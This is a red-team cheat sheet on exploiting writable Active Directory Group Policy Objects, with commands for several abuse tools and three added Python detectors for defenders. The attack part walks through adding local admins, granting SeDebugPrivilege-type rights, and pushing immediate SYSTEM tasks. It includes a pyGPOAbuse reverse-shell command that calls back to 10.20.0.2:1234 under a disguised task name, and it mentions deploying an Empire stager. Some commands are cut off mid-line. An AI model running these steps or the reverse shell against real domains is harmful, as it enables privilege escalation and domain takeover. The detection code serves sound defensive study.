# Group Policy Objects (GPO) Exploitation

## Tools: Bloodhound, PowerGPOAbuse, SharpGPOAbuse, pyGPOAbuse, Powerview, StandIn

## Location stored: SYSVOL directory

### The creator of a GPO is automatically granted explicit "Edit settings, delete, modify security" on it, which manifests in the ACL as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner

### GPO precedence: Organizational Unit (OU) > Domain > Site > Local (policies are applied Local, Site, Domain, then OU, and the last one applied wins on conflict)

### GPOs are stored on the DC under `\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\` (each folder is named after the GPO's GUID, not its display name), inside two subfolders, User and Machine. If you have the right to edit the GPO you can connect to the DC and replace the files. Scheduled tasks are located at `Machine\Preferences\ScheduledTasks\`.

### Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes, but a refresh can be forced locally with the following command:

```
gpupdate /force
```

## Finding vulnerable GPO

### Look for a GPO (reachable through a gPLink) on which your principal holds write rights, e.g. WriteProperty:

```
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -like "*WriteProperty*" }
```
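The ACL query above is also what a defender audits, but write rights on their own do not tell you whether a GPO was actually modified. The following added Python (not code from any tool on this page) shows the complementary detection: it evaluates constructed records shaped like Security event 5136 (Directory Service Changes) from a domain controller, pairs the value-deleted and value-added events by OpCorrelationID, and flags edits to groupPolicyContainer objects made by accounts outside an approved-editor list or that newly enable the Security Settings, Scheduled Tasks or Scripts client-side extensions. It assumes the DC audits Directory Service Changes with a SACL on the Policies container and that each event arrives as a dict of its EventData fields; the GPO GUID, account names and extension lists in the sample are constructed.

```python
"""Spot edits to Group Policy Container objects in Directory Service Changes
audit records (Security event 5136 from a domain controller).

Added defensive example; not code from any tool listed on this page.
Assumes the DC has the "Audit Directory Service Changes" subcategory enabled and a
SACL on CN=Policies,CN=System,<domain> so writes produce event 5136, and that
events arrive as dicts keyed by their EventData field names (constructed below).
"""
import re
from collections import defaultdict

# Client-side extension GUIDs that show up in gPCMachineExtensionNames /
# gPCUserExtensionNames once a GPO carries the corresponding setting type.
CSE_LABELS = {
    "{827D319E-6EAC-11D2-A4EA-00C04F79F83A}": "Security Settings (Restricted Groups, User Rights)",
    "{AADCED64-746C-4633-A97C-D61349046527}": "Preferences: Scheduled Tasks",
    "{42B5FAAE-6536-11D2-AE5A-0000F87571E3}": "Scripts (startup/shutdown/logon)",
}
GUID_RE = re.compile(r"\{[0-9A-F-]{36}\}")
VALUE_DELETED, VALUE_ADDED = "%%14675", "%%14674"  # OperationType codes in 5136


def detect_gpo_changes(events, approved_editors):
    """Return one finding per (operation, GPO, attribute) that is either performed by an
    account outside approved_editors or introduces a high-impact CSE / ACL change.
    Events are paired by OpCorrelationID so old and new attribute values can be diffed."""
    approved = {a.upper() for a in approved_editors}
    groups = defaultdict(lambda: {"old": "", "new": "", "actor": ""})
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("ObjectClass", "").lower() != "grouppolicycontainer":
            continue  # user/computer/OU edits are out of scope here
        key = (ev.get("OpCorrelationID"), ev.get("ObjectDN"), ev.get("AttributeLDAPDisplayName"))
        g = groups[key]
        slot = "old" if ev.get("OperationType") == VALUE_DELETED else "new"
        g[slot] = ev.get("AttributeValue") or ""
        g["actor"] = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"

    findings = []
    for (_, dn, attr), g in groups.items():
        reasons = []
        if g["actor"].upper() not in approved:
            reasons.append(f"editor {g['actor']} is not an approved GPO editor")
        if attr in ("gPCMachineExtensionNames", "gPCUserExtensionNames"):
            before = set(GUID_RE.findall(g["old"].upper()))
            after = set(GUID_RE.findall(g["new"].upper()))
            for guid in sorted(after - before):
                if guid in CSE_LABELS:
                    reasons.append(f"{CSE_LABELS[guid]} extension newly enabled")
        if attr == "nTSecurityDescriptor":
            reasons.append("GPO security descriptor (who can edit it) changed")
        if reasons:
            findings.append({"gpo": dn, "actor": g["actor"], "attribute": attr, "reasons": reasons})
    return findings


# Constructed sample records (not real log data); GPO GUID and names are placeholders.
GPO_DN = "CN={11111111-2222-3333-4444-555555555555},CN=Policies,CN=System,DC=lab,DC=local"


def _ev(corr, user, attr, op, value, obj_class="groupPolicyContainer", dn=GPO_DN):
    return {"EventID": 5136, "OpCorrelationID": corr, "SubjectDomainName": "LAB",
            "SubjectUserName": user, "ObjectDN": dn, "ObjectClass": obj_class,
            "AttributeLDAPDisplayName": attr, "OperationType": op, "AttributeValue": value}


SAMPLE_EVENTS = [
    # Routine edit by the designated GPO admin: only the version counter moves.
    _ev("{A}", "gpo-admin", "versionNumber", VALUE_DELETED, "3"),
    _ev("{A}", "gpo-admin", "versionNumber", VALUE_ADDED, "4"),
    # A non-admin account adds the Scheduled Tasks preference CSE to the machine side
    # (the Registry CSE pair was already present before the change).
    _ev("{B}", "bob.smith", "gPCMachineExtensionNames", VALUE_DELETED,
        "[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}]"),
    _ev("{B}", "bob.smith", "gPCMachineExtensionNames", VALUE_ADDED,
        "[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}]"
        "[{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"),
    # Unrelated 5136 on a user object: ignored.
    _ev("{C}", "bob.smith", "description", VALUE_ADDED, "helpdesk", obj_class="user",
        dn="CN=bob.smith,CN=Users,DC=lab,DC=local"),
]

if __name__ == "__main__":
    for f in detect_gpo_changes(SAMPLE_EVENTS, approved_editors=["LAB\\gpo-admin"]):
        print(f["gpo"], f["actor"], f["attribute"], "; ".join(f["reasons"]))
```

Pairing on OpCorrelationID matters: a single 5136 "value added" event carries the whole new attribute value, so checking it for a GUID would re-alert on extensions the GPO already had; diffing against the matching "value deleted" event isolates what this edit introduced.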

#### 1)

```
runas /netonly /user:DOMAIN\AD_USERNAME cmd.exe
```

#### 2)

```
dir \\DOMAIN\sysvol
```

#### 3) Run mmc

#### 4) File -> Add/Remove Snap-in

#### 5) Select Group Policy Management, then click Add

#### 6) OK

#### 7) Navigate to a GPO our user has permission to modify

#### 8) Right-click the GPO and select Edit

### Add our account to local groups

#### 1) Expand Computer Configuration

#### 2) Expand Policies

#### 3) Expand Windows Settings

#### 4) Expand Security Settings

#### 5) Right-click on Restricted Groups and select Add Group

#### 6) Click Browse, enter IT Support (example) and click Check Names

#### 7) Click OK twice

#### 8) In the second list ("This group is a member of"), add the Administrators and Remote Desktop Users groups

#### 9) Click Apply and OK, then wait about 15 minutes for the GPO to be applied

## SharpGPOAbuse <https://github.com/FSecureLABS/SharpGPOAbuse>

#### 1) Build and configure SharpGPOAbuse

```
Install-Package CommandLineParser -Version 1.9.3.15

$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.
```

#### 2) Adding User Rights

```
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight"
```

#### 3) Adding a Local Admin

```
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
```
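Both the Restricted Groups procedure above and the SharpGPOAbuse `--AddLocalAdmin` / `--AddUserRights` commands (like the equivalent PowerGPOAbuse and StandIn commands further down) end up as entries in the GPO's Security Settings template, `Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf` under SYSVOL, which is therefore the file a defender should diff and review. This added Python (not code from any of those tools) parses that file and reports members pushed into Administrators or Remote Desktop Users, and sensitive user rights granted to principals not on an approved list. The SIDs and file contents in the sample are constructed; real files are usually UTF-16 with a BOM, so read them with that encoding before passing the text in.

```python
"""Audit a GPO's Security Settings template (Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf)
for Restricted Groups and User Rights Assignment entries that hand out local admin
or sensitive privileges.

Added defensive example; not code from any tool on this page. It assumes the file has
already been read from SYSVOL (real files are usually UTF-16 with a BOM) and is passed as text.
"""
import re

# Well-known SIDs of local groups whose membership a GPO should rarely be touching.
PRIVILEGED_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
}

# User rights that equate to SYSTEM-level control, ownership takeover or remote logon.
SENSITIVE_RIGHTS = {
    "SeDebugPrivilege", "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege",
    "SeTcbPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeRemoteInteractiveLogonRight",
}


def parse_inf(text):
    """Minimal INI parser: {section: {key: value}} keeping raw keys such as
    '*S-1-5-32-544__Members' (the template is not valid for configparser)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip()] = value.strip()
    return sections


def split_principals(value):
    """'*S-1-5-21-...-1105,*S-1-5-32-544' -> ['S-1-5-21-...-1105', 'S-1-5-32-544'].
    A leading '*' marks a SID; account names may also appear verbatim."""
    return [p.strip().lstrip("*") for p in value.split(",") if p.strip()]


def group_label(principal):
    """Map a SID or name to one of the privileged group labels, else None."""
    if principal in PRIVILEGED_GROUPS:
        return PRIVILEGED_GROUPS[principal]
    return principal if principal in PRIVILEGED_GROUPS.values() else None


def audit_gpttmpl(text, approved_sids=frozenset()):
    """Return findings for principals pushed into privileged local groups and for
    sensitive user rights granted to principals outside approved_sids."""
    findings = []
    inf = parse_inf(text)
    for key, value in inf.get("Group Membership", {}).items():
        m = re.match(r"^\*?(.+?)__(Members|Memberof)$", key, re.IGNORECASE)
        if not m:
            continue
        subject, direction = m.group(1), m.group(2).lower()
        for principal in split_principals(value):
            if direction == "members":          # listed principals are put INTO the subject group
                who, grp = principal, group_label(subject)
            else:                               # Memberof: the subject is put into each listed group
                who, grp = subject, group_label(principal)
            if grp and who not in approved_sids:
                findings.append({"kind": "restricted_group", "group": grp, "principal": who})
    for right, value in inf.get("Privilege Rights", {}).items():
        if right not in SENSITIVE_RIGHTS:
            continue
        for principal in split_principals(value):
            if principal not in approved_sids:
                findings.append({"kind": "user_right", "right": right, "principal": principal})
    return findings


# Constructed sample template; the domain SIDs are placeholders.
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1111-2222-3333-1105
*S-1-5-32-555__Members = *S-1-5-21-1111-2222-3333-1105,*S-1-5-21-1111-2222-3333-513
[Privilege Rights]
SeDebugPrivilege = *S-1-5-21-1111-2222-3333-1105
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-545
"""

if __name__ == "__main__":
    for f in audit_gpttmpl(SAMPLE_GPTTMPL):
        print(f)
```

Running it against every `GptTmpl.inf` under `SYSVOL\<domain>\Policies` and keeping the approved-SID set to the accounts that are supposed to be local admins turns an ad-hoc check into a baseline; a new principal in Administrators or a new SeDebugPrivilege grant is then a one-line diff.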

#### 4) Configuring a User or Computer Logon script

```
.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents
```

#### 5) Configuring a Computer or User Immediate Task

### /!\ An immediate task is intended to "run once" per GPO refresh, not once per system

```
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command

.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\
```

## PowerGPOAbuse <https://github.com/rootSySdk/PowerGPOAbuse>

#### 1) Run the module

```
PS> . .\PowerGPOAbuse.ps1
```

#### 2) Adding a localadmin

```
PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
```

#### 3) Assign a new right

```
PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
```

#### 4) Adding a New Computer/User script

```
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get
```

#### 5) Create an immediate task

```
PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments
```

## pyGPOAbuse <https://github.com/Hackndo/pyGPOAbuse>

#### 1) Add user john to the local Administrators group (password: H4x00r123..)

```
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

#### 2) Reverse shell

```
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
    -powershell \
    -command "$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \
    -user
```

## Powerview

#### 1) Enumerate GPOs and their ACLs

```
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
```

#### 2) New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO

```
New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments
```

## StandIn <https://github.com/FuzzySecurity/StandIn>

#### 1) Add a local administrator

```
StandIn.exe --gpo --filter Shards --localadmin user002
```

#### 2) Set custom right to a user

```
StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege
```

#### 3) Execute custom command

```
StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK
```
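Every immediate-task command on this page (SharpGPOAbuse `--AddComputerTask`, PowerGPOAbuse `Add-GPOImmediateTask`, pyGPOAbuse, PowerView `New-GPOImmediateTask` and StandIn `--tasktype`) is stored in the GPO's Preferences XML in SYSVOL, `Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` for computer tasks (`User\...` for user tasks), and that file is what a defender should inventory. This added Python (not code from any of those tools) lists the task entries and flags the pattern the tooling leaves behind: an ImmediateTaskV2 running as SYSTEM, or any task whose action is a script host. The XML sample is constructed; the `clsid` attributes real files carry are omitted because the parser does not rely on them.

```python
"""Inventory the scheduled tasks a GPO pushes through Group Policy Preferences
(Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml) and flag entries that look
like the immediate SYSTEM tasks GPO-abuse tooling creates.

Added defensive example; not code from any tool on this page. It assumes the XML has
already been read from SYSVOL and is passed in as text; the sample below is constructed.
"""
import ntpath
import xml.etree.ElementTree as ET  # use defusedxml for files from an untrusted host

TASK_TAGS = {"ImmediateTaskV2", "TaskV2", "ImmediateTask", "Task"}
# Script hosts and LOLBins whose presence as a GPO task action warrants a look.
INTERPRETERS = {"cmd", "powershell", "pwsh", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin"}


def _exe_name(command):
    """'C:\\Windows\\System32\\cmd.exe' -> 'cmd' (quotes and .exe stripped)."""
    name = ntpath.basename(command.strip().strip('"')).lower()
    return name[:-4] if name.endswith(".exe") else name


def audit_scheduled_tasks(xml_text):
    """Return one record per task element with the fields a responder needs."""
    root = ET.fromstring(xml_text)
    records = []
    for task in root:
        if task.tag not in TASK_TAGS:
            continue
        props = task.find("Properties")
        if props is None:
            continue
        run_as = props.get("runAs", "")
        inner = props.find("Task")          # the embedded Task Scheduler 2.0 definition
        author, commands, exes = "", [], []
        if inner is not None:
            author = inner.findtext("RegistrationInfo/Author", default="")
            for ex in inner.findall("Actions/Exec"):
                cmd = ex.findtext("Command", default="")
                args = ex.findtext("Arguments", default="")
                commands.append(f"{cmd} {args}".strip())
                exes.append(_exe_name(cmd))
        immediate = task.tag.startswith("Immediate")
        as_system = run_as.upper().endswith("SYSTEM")
        uses_interpreter = any(e in INTERPRETERS for e in exes)
        records.append({
            "type": task.tag,
            "name": task.get("name", ""),
            "uid": task.get("uid", ""),
            "changed": task.get("changed", ""),
            "author": author,
            "run_as": run_as,
            "commands": commands,
            # Heuristic: immediate SYSTEM tasks, or any task launching a script host, are
            # what GPO-abuse tooling produces; legitimate tasks can match too, so verify.
            "suspicious": (immediate and as_system) or uses_interpreter,
        })
    return records


# Constructed sample: one planted-looking immediate task and one ordinary helpdesk task.
SAMPLE_SCHEDULED_TASKS_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="Update" image="0" changed="2024-01-01 00:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>LAB\Admin</Author><Description></Description></RegistrationInfo>
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals>
        <Actions Context="Author"><Exec><Command>cmd.exe</Command><Arguments>/c whoami /all</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Disk Cleanup" image="2" changed="2023-06-01 10:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" name="Disk Cleanup" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
      <Task version="1.2">
        <RegistrationInfo><Author>LAB\HelpDesk</Author></RegistrationInfo>
        <Actions Context="Author"><Exec><Command>cleanmgr.exe</Command><Arguments>/sagerun:1</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

if __name__ == "__main__":
    for rec in audit_scheduled_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        flag = "SUSPICIOUS" if rec["suspicious"] else "ok"
        print(f"[{flag}] {rec['type']} {rec['name']!r} by {rec['author']} as {rec['run_as']}: {rec['commands']}")
```

The `changed` timestamp and `Author` element are worth keeping in the record: tooling lets the attacker set the author freely (the `--Author` options above), so an author that does not match the account that modified the GPO in the DC audit trail is itself a signal.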
